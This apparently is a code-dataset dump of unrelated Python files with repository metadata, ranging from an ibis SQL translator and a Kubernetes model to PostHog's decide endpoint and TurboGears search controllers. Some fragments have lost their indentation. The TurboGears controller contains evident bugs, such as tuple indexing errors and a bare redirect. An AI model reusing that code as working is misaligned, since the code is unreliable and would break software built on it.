return self.check_unique_identifier(), self.check_persistent_identifier()
def check_minimal_metatadata(self):
core_metadata_check = FAIREvaluatorCoreMetadata(self)
core_metadata_check.set_metric('FsF-F2-01M', metrics=FAIRCheck.METRICS)
return core_metadata_check.getResult()
def check_content_identifier_included(self):
content_included_check = FAIREvaluatorContentIncluded(self)
content_included_check.set_metric('FsF-F3-01M', metrics=FAIRCheck.METRICS)
return content_included_check.getResult()
def check_data_access_level(self):
data_access_level_check = FAIREvaluatorDataAccessLevel(self)
data_access_level_check.set_metric('FsF-A1-01M', metrics=FAIRCheck.METRICS)
return data_access_level_check.getResult()
def check_license(self):
license_check = FAIREvaluatorLicense(self)
license_check.set_metric('FsF-R1.1-01M', metrics=FAIRCheck.METRICS)
return license_check.getResult()
def check_relatedresources(self):
related_check = FAIREvaluatorRelatedResources(self)
related_check.set_metric('FsF-I3-01M', metrics=FAIRCheck.METRICS)
return related_check.getResult()
def check_searchable(self):
searchable_check = FAIREvaluatorSearchable(self)
searchable_check.set_metric('FsF-F4-01M', metrics=FAIRCheck.METRICS)
return searchable_check.getResult()
def check_data_file_format(self):
data_file_check = FAIREvaluatorFileFormat(self)
data_file_check.set_metric('FsF-R1.3-02D', metrics=FAIRCheck.METRICS)
return data_file_check.getResult()
def check_community_metadatastandards(self):
community_metadata_check = FAIREvaluatorCommunityMetadata(self)
community_metadata_check.set_metric('FsF-R1.3-01M', metrics=FAIRCheck.METRICS)
return community_metadata_check.getResult()
def check_data_provenance(self):
data_prov_check = FAIREvaluatorDataProvenance(self)
data_prov_check.set_metric('FsF-R1.2-01M', metrics=FAIRCheck.METRICS)
return data_prov_check.getResult()
def check_data_content_metadata(self):
data_content_metadata_check = FAIREvaluatorDataContentMetadata(self)
data_content_metadata_check.set_metric('FsF-R1-01MD', metrics=FAIRCheck.METRICS)
return data_content_metadata_check.getResult()
def check_formal_metadata(self):
formal_metadata_check = FAIREvaluatorFormalMetadata(self)
formal_metadata_check.set_metric('FsF-I1-01M', metrics=FAIRCheck.METRICS)
return formal_metadata_check.getResult()
def check_semantic_vocabulary(self):
semantic_vocabulary_check = FAIREvaluatorSemanticVocabulary(self)
semantic_vocabulary_check.set_metric('FsF-I1-02M', metrics=FAIRCheck.METRICS)
return semantic_vocabulary_check.getResult()
def check_metadata_preservation(self):
metadata_preserved_check = FAIREvaluatorMetadataPreserved(self)
metadata_preserved_check.set_metric('FsF-A2-01M', metrics=FAIRCheck.METRICS)
return metadata_preserved_check.getResult()
def check_standardised_protocol_data(self):
standardised_protocol_check = FAIREvaluatorStandardisedProtocolData(self)
standardised_protocol_check.set_metric('FsF-A1-03D', metrics=FAIRCheck.METRICS)
return standardised_protocol_check.getResult()
def check_standardised_protocol_metadata(self):
standardised_protocol_metadata_check = FAIREvaluatorStandardisedProtocolMetadata(self)
standardised_protocol_metadata_check.set_metric('FsF-A1-02M', metrics=FAIRCheck.METRICS)
return standardised_protocol_metadata_check.getResult()
def get_log_messages_dict(self):
logger_messages ={}
self.logger_message_stream.seek(0)
for log_message in self.logger_message_stream.readlines():
if log_message.startswith('FsF-'):
m = log_message.split(":", 1)
metric = m[0].strip()
message_n_level = m[1].strip().split("|",1)
level = message_n_level[1]
message = message_n_level[0]
if metric not in logger_messages:
logger_messages[metric] =[]
if message not in logger_messages[metric]:
logger_messages[metric].append(level.replace('\n', '')+': '+message.strip())
return logger_messages
| 54.382514
| 159
| 0.665293
|
ba89c76b9ab60463cfdd24a54b619b97f7995b30
| 2,779
|
py
|
Python
|
ibis/backends/base/sql/alchemy/translator.py
|
harsharaj96/ibis
|
ab3de68eb6596eca5cc7cba8c3fdb583f6143a4e
|
[
"Apache-2.0"
] | null | null | null |
ibis/backends/base/sql/alchemy/translator.py
|
harsharaj96/ibis
|
ab3de68eb6596eca5cc7cba8c3fdb583f6143a4e
|
[
"Apache-2.0"
] | null | null | null |
ibis/backends/base/sql/alchemy/translator.py
|
harsharaj96/ibis
|
ab3de68eb6596eca5cc7cba8c3fdb583f6143a4e
|
[
"Apache-2.0"
] | 1
|
2017-11-30T13:32:23.000Z
|
2017-11-30T13:32:23.000Z
|
import ibis
import ibis.expr.operations as ops
import ibis.expr.types as ir
from ibis import util
from ibis.backends.base.sql.compiler import ExprTranslator, QueryContext
from .datatypes import ibis_type_to_sqla, to_sqla_type
from .query_builder import to_sqlalchemy
from .registry import fixed_arity, sqlalchemy_operation_registry
class AlchemyContext(QueryContext):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._table_objects = {}
def collapse(self, queries):
if isinstance(queries, str):
return queries
if len(queries) > 1:
raise NotImplementedError(
'Only a single query is supported for SQLAlchemy backends'
)
return queries[0]
def subcontext(self):
return type(self)(
dialect=self.dialect, parent=self, params=self.params
)
def _to_sql(self, expr, ctx):
return to_sqlalchemy(expr, ctx)
def _compile_subquery(self, expr):
sub_ctx = self.subcontext()
return self._to_sql(expr, sub_ctx)
def has_table(self, expr, parent_contexts=False):
key = self._get_table_key(expr)
return self._key_in(
key, '_table_objects', parent_contexts=parent_contexts
)
def set_table(self, expr, obj):
key = self._get_table_key(expr)
self._table_objects[key] = obj
def get_table(self, expr):
"""
Get the memoized SQLAlchemy expression object
"""
return self._get_table_item('_table_objects', expr)
class AlchemyExprTranslator(ExprTranslator):
_registry = sqlalchemy_operation_registry
_rewrites = ExprTranslator._rewrites.copy()
_type_map = ibis_type_to_sqla
context_class = AlchemyContext
def name(self, translated, name, force=True):
if hasattr(translated, 'label'):
return translated.label(name)
return translated
def get_sqla_type(self, data_type):
return to_sqla_type(data_type, type_map=self._type_map)
rewrites = AlchemyExprTranslator.rewrites
@rewrites(ops.NullIfZero)
def _nullifzero(expr):
arg = expr.op().args[0]
return (arg == 0).ifelse(ibis.NA, arg)
# TODO This was previously implemented with the legacy `@compiles` decorator.
# This definition should now be in the registry, but there is some magic going
# on that things fail if it's not defined here (and in the registry
# `operator.truediv` is used.
def _true_divide(t, expr):
op = expr.op()
left, right = args = op.args
if util.all_of(args, ir.IntegerValue):
return t.translate(left.div(right.cast('double')))
return fixed_arity(lambda x, y: x / y, 2)(t, expr)
AlchemyExprTranslator._registry[ops.Divide] = _true_divide
| 28.649485
| 78
| 0.68154
|
e16c3b49d8607d317962611838154deae984da20
| 482
|
py
|
Python
|
make-your-own-text-adventure-with-python/homework/automobile.py
|
learning-game-development/learning-python-game-development
|
326b72eadab0bfb14f70f295b492f76d139dde33
|
[
"Unlicense"
] | null | null | null |
make-your-own-text-adventure-with-python/homework/automobile.py
|
learning-game-development/learning-python-game-development
|
326b72eadab0bfb14f70f295b492f76d139dde33
|
[
"Unlicense"
] | null | null | null |
make-your-own-text-adventure-with-python/homework/automobile.py
|
learning-game-development/learning-python-game-development
|
326b72eadab0bfb14f70f295b492f76d139dde33
|
[
"Unlicense"
] | null | null | null |
class Vehicle:
def __init__(self):
raise NotImplementedError("Do not create raw Vehicle objects.")
def __str__(self):
return "{} has {} wheels".format(self.name, self.wheels)
class Motorcycle(Vehicle):
def __init__(self, name):
self.name = name
self.wheels = 2
class Car(Vehicle):
def __init__(self, name):
self.name = name
self.wheels = 4
print(Motorcycle('Yamaha'))
print(Car('Ford Mustang'))
print(Vehicle())
| 20.956522
| 71
| 0.63278
|
9dcc1021bb7510e147001bb10d64287fcb163850
| 1,504
|
py
|
Python
|
lib/aquilon/worker/commands/show_active_locks.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 7
|
2015-07-31T05:57:30.000Z
|
2021-09-07T15:18:56.000Z
|
lib/aquilon/worker/commands/show_active_locks.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 115
|
2015-03-03T13:11:46.000Z
|
2021-09-20T12:42:24.000Z
|
lib/aquilon/worker/commands/show_active_locks.py
|
ned21/aquilon
|
6562ea0f224cda33b72a6f7664f48d65f96bd41a
|
[
"Apache-2.0"
] | 13
|
2015-03-03T11:17:59.000Z
|
2021-09-09T09:16:41.000Z
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2015,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq show active locks`."""
from aquilon.worker.broker import BrokerCommand
from aquilon.worker.locks import lock_queue
class CommandShowActiveLocks(BrokerCommand):
requires_transaction = False
defer_to_thread = False
# Even though this class imports lock_queue, it doesn't take any locks!
_is_lock_free = True
def render(self, **_):
retval = []
for key in lock_queue.queue[:]:
description = "Defunct lock: "
if hasattr(key.logger, "get_status"):
status = key.logger.get_status()
if status and status.description:
description = status.description + ' '
retval.append("%s%s %s" % (description, key.state, key))
return retval
| 37.6
| 75
| 0.688165
|
dadafddbc6bf0eb3cdcc944880c03fb5f7107dde
| 92
|
py
|
Python
|
tests/modules/withenum.py
|
jjerphan/py2puml
|
b39dee92609440afea1301fe68c17f6cff5fa04f
|
[
"MIT"
] | null | null | null |
tests/modules/withenum.py
|
jjerphan/py2puml
|
b39dee92609440afea1301fe68c17f6cff5fa04f
|
[
"MIT"
] | null | null | null |
tests/modules/withenum.py
|
jjerphan/py2puml
|
b39dee92609440afea1301fe68c17f6cff5fa04f
|
[
"MIT"
] | null | null | null |
from enum import Enum
class TimeUnit(Enum):
DAYS = 'd'
HOURS = 'h'
MINUTE = 'm'
| 15.333333
| 21
| 0.576087
|
a7df81b887e5acb5f25243723afff2b5af7b93ed
| 124
|
py
|
Python
|
django_manager/urls.py
|
gitliuhao/django_manager
|
8eedbccff525ba187ac08561b3116b59174dbd5b
|
[
"MIT"
] | 2
|
2018-05-03T02:25:14.000Z
|
2018-05-06T11:05:03.000Z
|
django_manager/urls.py
|
gitliuhao/django_manager
|
8eedbccff525ba187ac08561b3116b59174dbd5b
|
[
"MIT"
] | null | null | null |
django_manager/urls.py
|
gitliuhao/django_manager
|
8eedbccff525ba187ac08561b3116b59174dbd5b
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'upload$', views.upload, name='upload'),
]
| 24.8
| 50
| 0.677419
|
62b1cdb6275604233260f915ee0581e91bce7bcf
| 4,896
|
py
|
Python
|
kubernetes_asyncio/client/models/core_v1_event_series.py
|
tomplus/kubernetes-asyncio
|
11c3eb4d50ae822545572aa7b8c15f7153f65a1c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/core_v1_event_series.py
|
tomplus/kubernetes-asyncio
|
11c3eb4d50ae822545572aa7b8c15f7153f65a1c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/core_v1_event_series.py
|
tomplus/kubernetes-asyncio
|
11c3eb4d50ae822545572aa7b8c15f7153f65a1c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.23.6
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from kubernetes_asyncio.client.configuration import Configuration
class CoreV1EventSeries(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'count': 'int',
'last_observed_time': 'datetime'
}
attribute_map = {
'count': 'count',
'last_observed_time': 'lastObservedTime'
}
def __init__(self, count=None, last_observed_time=None, local_vars_configuration=None): # noqa: E501
"""CoreV1EventSeries - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._count = None
self._last_observed_time = None
self.discriminator = None
if count is not None:
self.count = count
if last_observed_time is not None:
self.last_observed_time = last_observed_time
@property
def count(self):
"""Gets the count of this CoreV1EventSeries. # noqa: E501
Number of occurrences in this series up to the last heartbeat time # noqa: E501
:return: The count of this CoreV1EventSeries. # noqa: E501
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this CoreV1EventSeries.
Number of occurrences in this series up to the last heartbeat time # noqa: E501
:param count: The count of this CoreV1EventSeries. # noqa: E501
:type count: int
"""
self._count = count
@property
def last_observed_time(self):
"""Gets the last_observed_time of this CoreV1EventSeries. # noqa: E501
Time of the last occurrence observed # noqa: E501
:return: The last_observed_time of this CoreV1EventSeries. # noqa: E501
:rtype: datetime
"""
return self._last_observed_time
@last_observed_time.setter
def last_observed_time(self, last_observed_time):
"""Sets the last_observed_time of this CoreV1EventSeries.
Time of the last occurrence observed # noqa: E501
:param last_observed_time: The last_observed_time of this CoreV1EventSeries. # noqa: E501
:type last_observed_time: datetime
"""
self._last_observed_time = last_observed_time
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CoreV1EventSeries):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, CoreV1EventSeries):
return True
return self.to_dict() != other.to_dict()
| 30.222222
| 124
| 0.605188
|
6d59da701657159ec9a44c85d6c9fa8c6bed7d93
| 1,510
|
py
|
Python
|
test/test_parser_yaml.py
|
fschrader1992/python-odml
|
48d83b7a3d4514100649b2338d3b018ba1db03fd
|
[
"BSD-4-Clause"
] | null | null | null |
test/test_parser_yaml.py
|
fschrader1992/python-odml
|
48d83b7a3d4514100649b2338d3b018ba1db03fd
|
[
"BSD-4-Clause"
] | null | null | null |
test/test_parser_yaml.py
|
fschrader1992/python-odml
|
48d83b7a3d4514100649b2338d3b018ba1db03fd
|
[
"BSD-4-Clause"
] | null | null | null |
import os
import unittest
import yaml
from odml.tools import dict_parser
from odml.tools.parser_utils import ParserException, InvalidVersionException
class TestYAMLParser(unittest.TestCase):
def setUp(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
self.basepath = os.path.join(dir_path, "resources")
self.yaml_reader = dict_parser.DictReader()
def test_missing_root(self):
filename = "missing_root.yaml"
message = "Missing root element"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_missing_version(self):
filename = "missing_version.yaml"
message = "Could not find odml-version"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_invalid_version(self):
filename = "invalid_version.yaml"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(InvalidVersionException):
_ = self.yaml_reader.to_odml(parsed_doc)
| 30.816327
| 76
| 0.684768
|
cb96d13bd64021fde5b0bbb2a972c35262e833a4
| 2,497
|
py
|
Python
|
posthog/api/decide.py
|
Kacppian/posthog
|
faa0696e3219f9162a3fd59501e126a7cd79ec8c
|
[
"MIT"
] | null | null | null |
posthog/api/decide.py
|
Kacppian/posthog
|
faa0696e3219f9162a3fd59501e126a7cd79ec8c
|
[
"MIT"
] | null | null | null |
posthog/api/decide.py
|
Kacppian/posthog
|
faa0696e3219f9162a3fd59501e126a7cd79ec8c
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.http import JsonResponse, HttpRequest
from django.views.decorators.csrf import csrf_exempt
from typing import Optional, List, Any, Dict
from posthog.utils import cors_response
from urllib.parse import urlparse
from posthog.models import FeatureFlag, Team
import json
import base64
import secrets
def _load_data(data: str) -> Dict[str, Any]:
return json.loads(
base64.b64decode(data.replace(" ", "+") + "===")
.decode("utf8", "surrogatepass")
.encode("utf-16", "surrogatepass")
)
def feature_flags(request: HttpRequest) -> List[str]:
if request.method != "POST" or not request.POST.get("data"):
return []
data = _load_data(request.POST["data"])
team = Team.objects.get_cached_from_token(data["token"])
flags_enabled = []
feature_flags = FeatureFlag.objects.filter(team=team, active=True, deleted=False)
for feature_flag in feature_flags:
if feature_flag.distinct_id_matches(data["distinct_id"]):
flags_enabled.append(feature_flag.key)
return flags_enabled
def parse_domain(url: Any) -> Optional[str]:
return urlparse(url).hostname
@csrf_exempt
def get_decide(request: HttpRequest):
response = {
"config": {"enable_collect_everything": True},
"editorParams": {},
"isAuthenticated": False,
"supportedCompression": ["gzip", "lz64"],
}
if request.user.is_authenticated:
team = request.user.team_set.get()
permitted_domains = ["127.0.0.1", "localhost"]
for url in team.app_urls:
hostname = parse_domain(url)
if hostname:
permitted_domains.append(hostname)
if (parse_domain(request.headers.get("Origin")) in permitted_domains) or (
parse_domain(request.headers.get("Referer")) in permitted_domains
):
response["isAuthenticated"] = True
editor_params = {}
if request.user.toolbar_mode == "toolbar":
editor_params["toolbarVersion"] = "toolbar"
if settings.DEBUG:
editor_params["jsURL"] = "http://localhost:8234/"
response["editorParams"] = editor_params
if not request.user.temporary_token:
request.user.temporary_token = secrets.token_urlsafe(32)
request.user.save()
response["featureFlags"] = feature_flags(request)
return cors_response(request, JsonResponse(response))
| 32.428571
| 85
| 0.655186
|
ee9729140a851b030f09698e5c872875b5c5cfa6
| 191
|
py
|
Python
|
launch.py
|
DmitriyKhudiakov/Compressor_calc_data
|
d623e54d01c8f157a4aedc2b8cab6e1a1ff5e44d
|
[
"MIT"
] | null | null | null |
launch.py
|
DmitriyKhudiakov/Compressor_calc_data
|
d623e54d01c8f157a4aedc2b8cab6e1a1ff5e44d
|
[
"MIT"
] | null | null | null |
launch.py
|
DmitriyKhudiakov/Compressor_calc_data
|
d623e54d01c8f157a4aedc2b8cab6e1a1ff5e44d
|
[
"MIT"
] | null | null | null |
import sys
from PyQt5.QtWidgets import QApplication
from classes.MainWidget import MainWidget
def start():
app = QApplication(sys.argv)
win = MainWidget()
sys.exit(app.exec_())
| 19.1
| 41
| 0.732984
|
ac6231b0727d4b0a0c7064a2e6755d3a3257f162
| 186
|
py
|
Python
|
API/app/main/schema/user_schema.py
|
Niewidzialny84/PathFighters
|
9cf9cfcde60cb5e57c5c68ba995c34955b78caf9
|
[
"MIT"
] | 9
|
2021-08-19T16:57:13.000Z
|
2022-01-25T16:14:11.000Z
|
API/app/main/schema/user_schema.py
|
Niewidzialny84/PathFighters
|
9cf9cfcde60cb5e57c5c68ba995c34955b78caf9
|
[
"MIT"
] | 29
|
2021-10-18T15:37:53.000Z
|
2022-01-26T08:28:37.000Z
|
API/app/main/schema/user_schema.py
|
Niewidzialny84/PathFighters
|
9cf9cfcde60cb5e57c5c68ba995c34955b78caf9
|
[
"MIT"
] | 1
|
2022-01-19T01:53:11.000Z
|
2022-01-19T01:53:11.000Z
|
from .. import ma
class UserSchema(ma.Schema):
class Meta:
fields = ('id', 'username', 'email', 'password')
user_schema = UserSchema()
users_schema = UserSchema(many=True)
| 23.25
| 56
| 0.666667
|
a555200e54ee7d49549a65611fec9b75e3fb3fa8
| 1,524
|
py
|
Python
|
FUNDASTORE/urls.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
FUNDASTORE/urls.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
FUNDASTORE/urls.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
"""FUNDASTORE URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls import include
from django.conf.urls.static import static
from FUNDASTORE.APPS.PRODUCTOS.views import *
from FUNDASTORE.APPS.PRINCIPAL.views import *
urlpatterns = [
path('admin/', admin.site.urls),
path('accounts/',include('django.contrib.auth.urls')),
path('',inicio, name='inicio'),
path('Nosotros',nosotros, name='nosotros'),
path('Contactenos', ver_contactenos, name='principal-contactenos'),
path('ListarProductos',listarProductos, name='listarProductos'),
path('AgregarProductos',agregarProductos),
path('EditarProductos/<int:id>',editarProducto, name='editarProducto'),
path('EliminarProductos/<int:id>',eliminarProducto, name='eliminarProducto'),
]
urlpatterns+=static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
| 39.076923
| 81
| 0.736877
|
8744adf97536399d9779ff129157dc68ae2648d3
| 18,324
|
py
|
Python
|
bot_project/buzzbot/identity_controllers.py
|
pbarton666/buzz_bot
|
9f44c66e8ecb10e231f70989421f164d7a55029a
|
[
"MIT"
] | null | null | null |
bot_project/buzzbot/identity_controllers.py
|
pbarton666/buzz_bot
|
9f44c66e8ecb10e231f70989421f164d7a55029a
|
[
"MIT"
] | null | null | null |
bot_project/buzzbot/identity_controllers.py
|
pbarton666/buzz_bot
|
9f44c66e8ecb10e231f70989421f164d7a55029a
|
[
"MIT"
] | null | null | null |
import turbogears as tg
from turbogears import controllers, expose, flash, identity, widgets, validate, redirect, validators, error_handler
from turbogears import *
from cherrypy import request, response
from datetime import datetime
import time
from string import join
import random
from sqlobject.sqlbuilder import *
import model
from model import *
from string import join
import random
# from buzzbot import json
import logging
log = logging.getLogger("buzzbot.controllers")
#create a widget list for fields in the search specification form
class SearchFields(widgets.WidgetsList):
id = widgets.HiddenField()
name=widgets.TextField(label= "Name:")
description = widgets.TextField(label="Description:")
#client_id = widgets.TextField(label="Client ID:")
targetword = widgets.TextField(label="Target word:")
searchstring = widgets.TextField(label="Find content containing:")
maxurls = widgets.TextField(label="Max. URLs to Search:")
maxcontent = widgets.TextField(label="Max. content blocks to find:")
eliminationwords = widgets.TextField(label="...but not containing:")
#...these will be displayed on a custom form that instansiates the TableForm widget
class SearchForm(widgets.TableForm):
template= "buzzbot.templates.searchTemplate"
searchFormInstance = SearchForm(fields = SearchFields.declared_widgets,
action = "Post",
submit_text="Save")
class tableFormTemplate(widgets.TableForm):
pass
#set up a widget list and form for the verify search delete screen
class verifyDeleteFields(widgets.WidgetsList):
id = widgets.HiddenField()
name = widgets.TextField()
cancel = widgets.Button()
verifyDeleteFormInstance = widgets.TableForm(fields = verifyDeleteFields.declared_widgets,
action = "Post", submit_text="OK")
class checkBoxList(widgets.WidgetsList):
pass
class Root(controllers.RootController):
@expose(template="buzzbot.templates.welcome")
@identity.require(identity.not_anonymous())
def index(self):
import time
log.debug("Happy TurboGears Controller Responding For Duty")
flash("Your application is now running")
testme()
return dict(now=time.ctime())
@expose(template="buzzbot.templates.login")
def login(self, forward_url=None, previous_url=None, *args, **kw):
if not identity.current.anonymous and identity.was_login_attempted() \
and not identity.get_identity_errors():
raise redirect(tg.url(forward_url or previous_url or '/', kw))
forward_url = None
previous_url = request.path
msg = "You can use guest/guest if you don't yet have a login."
if identity.was_login_attempted():
msg = "The credentials you supplied were not correct or did not grant access to this resource."
elif identity.get_identity_errors():
msg = "You must provide your credentials before accessing this resource."
else:
msg = "Please log in."
forward_url = request.headers.get("Referer", "/")
forward_url="/buildLP"
response.status = 403
return dict(message=msg, previous_url=previous_url, logging_in=True,
original_parameters=request.params, forward_url=forward_url)
@expose()
def logout(self):
identity.current.logout()
raise redirect
@expose(template="buzzbot.templates.edit_search_form")
#deprecated, but keep for use as template
def testProjectFields1(self):
submit_action = "/saveProjectFields/"
#set up some values to send to the form
b=model.Search.select()
someb = b[0]
#inject these values into the form created from the ProjectFields widget list
return dict(form=searchFormInstance, values = someb, action = submit_action)
@expose()
#deprecated, but keep for use as template
def saveProjectFields(self, **kwargs):
#elements of the form have same names as the class attributes, so we can
# use them to set the database parameters.
#here, we're updating an existing search
parameter_1 = 10
if parameter_1 <> '0':
b= Search.get(parameter_1)
b.set(**kwargs)
else:
#this command tells the Search object to add it.
return "Search = (" + join(["%s : %s " %item for item in kwargs.iteritems()])
raise redirect("/index")
@expose(template="buzzbot.templates.viewContent")
def viewContent(self,searchNum):
conn = Content._connection
#change this statement to = searchNum
#sqlstmt = "SELECT * from content WHERE search_id > " + str(searchNum)
b=Content.select()
return dict(cont = b)
@expose(template="buzzbot.templates.verifyDeleteSearch")
def verifyDeleteSearch(self, searchNum):
#calls up a page to verify deletion of a search
b = Search.get(searchNum)
submit_action = "/deleteSearch/%s" %searchNum
#inject these values into the form created from the verifyDeleteFields widget list
return dict(form=verifyDeleteFormInstance, values = b, action = submit_action)
#to do: verify syntax here; write up a short data in/#aout piece for notes;
# do pop-up window for confirmation# ensure foreign keys work
def deleteSearch(self, number):
#actually deletes a search after user confirmation
if int(number) >0: #if number is less than zero, user cancelled action
Search.delete(int(number))
#returns user to main search view page
raise redirect("/viewSearches/" + str(random.randint(1,10000)))
@expose(template="buzzbot.templates.verifyDeleteLP")
def verifyDeleteLP(self, LPid):
#calls up a page to verify deletion of a search
b = Search.get(LPid)
submit_action = "/deleteLP/%s" %LPid
#inject these values into the form created from the verifyDeleteFields widget list
return dict(form=verifyDeleteFormInstance, values = b, action = submit_action)
#to do: verify syntax here; write up a short data in/#aout piece for notes;
# do pop-up window for confirmation# ensure foreign keys work
def deleteLP(self, number):
#actually deletes a search after user confirmation
if int(number) >0: #if number is less than zero, user cancelled action
Listeningpost.delete(int(number))
#returns user to main search view page
raise redirect("/viewLPs/" + str(random.randint(1,10000)))
#lists all the searches made by this user, those saved by others in the same group, and those
# saved as client-worthy (by an admin)
@expose(template="buzzbot.templates.viewSearches")
def viewSearches(self):
#figure out who this user is and where he belongs
thisID = identity.current.identity()
thisUser = thisID.user_id
thisUserGroup = thisID.groups
#grab all the searches - this is a bit inefficient, but we won't have millions for a while
searches = model.Search.select()
searchesToDisplay = [] #an array of search objects to pass the the controller
editURL = [] # ...and a parallel array that flags that editing is allowed
deleteURL =[] # ...and one to signal that deletion is allowed
allUsers = User.select()
#there's probably a more efficient way to do this, but this puts user's own searches on top
for s in searches:
if s.userid == thisUser: #give the user full run of his own searches
searchesToDisplay.append(s)
editURL.append("/editsearch/" + str(s.id) + "?owner")
deleteURL.append("/verifyDeleteSearch/" + str(s.id))
#if the search begins to someone else and it's public consider adding it
for s in searches:
if s.userid <> thisUser and s.is_public:
ownerSearchObj = User.selectBy(s.userid)
thisOwner = ownerSearchObj[0]
thisOwnerGroup = thisOwner.groups
if thisOwnerGroup == thisUserGroup:
searchesToDisplay.append(s)
editURL.append("/editsearch/" + str(s.id)+ "?nonOwner")
deleteURL.append("")
#now find client-worthy searches (perhaps added by an admin)
for s in searches:
if s.is_client_worthy:
#screen out searches we've already added
addMe=True
for d in searchesToDisplay:
if d.id == s.id:
addMe=False
if addMe:
searchesToDisplay.append(s)
editURL.append("/editsearch/" + str(s.id)+ "?built_in")
deleteURL.append("")
#create a widgetList to pass in; each will be named after the search it represents
widgetList = widgets.WidgetsList() #a true widgetsList object
wNameList=[] #a list of the widget names
for s in searchesToDisplay:
#for testing, if it has an even number check the box
if s.id%2 ==1: #note: % is the modulus operator:
mydefault = True #note: this will not take a 1 in place of true
else:
mydefault = False
wName = "ck_" + str(s.id)
#w = widgets.CheckBox(name = wName, default = mydefault, validators=validators.Bool)
w = widgets.CheckBox(name = wName, default = mydefault)
#for some reason the default value doesn't stick unless we specify it separately
w.default = mydefault
widgetList.append(w)
wNameList.append(wName)
#prepare the objects for display; this instansiates a TableForm widget, passing in our check boxes
myFormWidget = widgets.TableForm(fields = widgetList,
method = "post",
submit_text = "OK",
name = "formName"
)
#this directs the returned form to the processSearchInput method
submit_action="/processSearchInput"
return dict(form=myFormWidget, searches=searchesToDisplay, editlink = editURL,
deletelink = deleteURL, action = submit_action)
@expose()
def processSearchInput(self, **kwargs):
#the return is a tuple of (key, value) tuples for all the checked boxes, something like:
# {'ck_13': u'on', 'ck_11": u'on'}
args = kwargs.items()
searchOn=[]
for a in args:
boxName, state = args[a] #parse the tuple
searchOn.append(int(boxname[3:])) #strip the integer from the name
#now we have an array of integers indicating which searches go with this LP
#so...delete existing LP-search pairs
a=1
#...and add the current ones
a=0
return(dict[a])
#Controller to allow the user to edit the search parameters. Our named
# parameter_1 is the search number. If its value is 0 (a new search), we'll grab a null row
# which is conveniently populated with default values. This requires manual specification
